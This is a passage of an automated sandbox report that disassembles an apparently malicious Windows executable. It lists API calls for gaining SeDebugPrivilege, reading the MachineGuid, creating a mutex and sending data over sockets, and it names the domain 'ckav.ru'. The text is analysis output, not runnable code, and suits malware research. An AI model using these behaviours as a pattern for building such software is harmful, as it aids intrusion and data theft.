                              • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                              • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                              • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                              APIs
                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                              • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                              • String ID: SeDebugPrivilege
                              • API String ID: 3615134276-2896544425
                              • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                              • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                              • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                              • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                              • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateProcess
                              • String ID:
                              • API String ID: 1357844191-0
                              • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                              • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                              • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                              APIs
                              • GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: NameUser
                              • String ID:
                              • API String ID: 2645101109-0
                              • Opcode ID: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                              • Instruction ID: cd86427636297e763c0a42ccb852711c5927781faf2e94d4e6bb5dc6023ef8f2
                              • Opcode Fuzzy Hash: a7da28448db3172b96443927ad348f68214272ffe937b716ad81b86c5e2c6b81
                              • Instruction Fuzzy Hash: 93C04C711842087BFE116ED1DC06F483E199B45B59F104011B71C2C0D1D9F3A6516559
                              APIs
                              • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: recv
                              • String ID:
                              • API String ID: 1507349165-0
                              • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                              • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                              • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                              APIs
                              • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                              • _wmemset.LIBCMT ref: 00406244
                              • _wmemset.LIBCMT ref: 00406261
                              • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: _wmemset$ErrorInformationLastToken
                              • String ID: IDA$IDA
                              • API String ID: 487585393-2020647798
                              • Opcode ID: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                              • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                              • Opcode Fuzzy Hash: 64a5c42e22f073721f8dd171e99ae32576dde97d35dca3661b3250748495049d
                              • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 551 404ec7-404ec9 542->551 544 404eb3-404ebe freeaddrinfo 543->544 545 404ea9-404eb1 call 404de5 543->545 548 404ec0-404ec6 call 402bab 544->548 549 404ecb 544->549 545->544 548->551 554 404ecd-404ece 549->554 551->554 554->539
                              APIs
                              • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                              • socket.WS2_32(?,?,?), ref: 00404E7A
                              • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: freeaddrinfogetaddrinfosocket
                              • String ID:
                              • API String ID: 2479546573-0
                              • Opcode ID: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                              • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                              • Opcode Fuzzy Hash: 324a94be1e2a93b2d6943f125fe3df56ade79f34f6962390557e9620afcccf0f
                              • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 570 404113-404119 559->570 571 40417a 559->571 561 404192-4041a7 call 403c90 560->561 562 404184 560->562 561->562 569 4041a9-4041b8 call 403c59 561->569 564 404186-40418c 562->564 579 4041ba-4041d8 call 4040bb call 403d44 569->579 580 4041db-4041e4 call 402bab 569->580 570->571 574 40411b-404120 570->574 573 40417d-40417e call 403c40 571->573 581 404183 573->581 577 404122 574->577 578 404124-404140 call 4031e5 VirtualAlloc 574->578 577->578 578->571 588 404142-40415e call 4031e5 ReadFile 578->588 579->580 580->564 581->562 588->573 593 404160-404178 call 4031e5 588->593 593->573
                              APIs
                              • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                              • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                              • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$AllocCreateReadVirtual
                              • String ID: .tmp
                              • API String ID: 3585551309-2986845003
                              • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                              • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                              • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                              • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                              APIs
                              • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                              • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                              • GetLastError.KERNEL32 ref: 0041399E
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Error$CreateLastModeMutex
                              • String ID:
                              • API String ID: 3448925889-0
                              • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                              • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                              • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                              • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                              APIs
                              • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                              • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: File$CreatePointerWrite
                              • String ID:
                              • API String ID: 3672724799-0
                              • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                              • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                              • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                              • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                              APIs
                              • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$CreateFreeProcessThread_wmemset
                              • String ID: ckav.ru
                              • API String ID: 2915393847-2696028687
                              • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                              • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                              • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                              • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                              APIs
                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              • _wmemset.LIBCMT ref: 0040634F
                                • Part of subcall function 00406069: GetUserNameW.ADVAPI32(?,?,00000009,D4449184,00000000,00000000,?,00406361,00000000,CA,00000000,00000000,00000104,00000000,00000032), ref: 00406082
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser_wmemset
                              • String ID: CA
                              • API String ID: 2078537776-1052703068
                              • Opcode ID: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                              • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                              • Opcode Fuzzy Hash: 4afda30c811b228529c54d72888b6e374887d4959eaca369bf1b72bc4a37c641
                              • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                              APIs
                              • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: InformationToken
                              • String ID: IDA
                              • API String ID: 4114910276-365204570
                              • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                              • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                              • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                              • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                              APIs
                              • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc
                              • String ID: s1@
                              • API String ID: 190572456-427247929
                              • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                              • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                              • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                              • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                              APIs
                                • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                              • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                              • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateOpenProcessQueryValue
                              • String ID:
                              • API String ID: 1425999871-0
                              • Opcode ID: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                              • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                              • Opcode Fuzzy Hash: bcb9612233ffeb4634d4995e45ab0b963c80d9ccd10657b8c49858d8039cb957
                              • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                              APIs
                              • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: CheckMembershipToken
                              • String ID:
                              • API String ID: 1351025785-0
                              • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                              • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                              • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                              • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                              APIs
                              • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateDirectory
                              • String ID:
                              • API String ID: 4241100979-0
                              • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                              • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                              • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                              • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                              APIs
                              • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: InfoNativeSystem
                              • String ID:
                              • API String ID: 1721193555-0
                              • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                              • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                              • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                              • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                              APIs
                              • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.00000000004A0000.00000004.00000001.01000000.00000005.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_0yWVteGq5T.jbxd
                              Yara matches
                              Similarity
                              • API ID: send
                              • String ID:
                              • API String ID: 2809346765-0
                              • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                              • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                              • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                              • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                              APIs
                              • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
                              Memory Dump Source
                              • Source File: 00000000.00000002.3354681568.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.3354665339.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                              • Associated: 00000000.00000002.3354701338.0000000000415000.00000004.00000001.01000000.00000005.sdmpDownload File
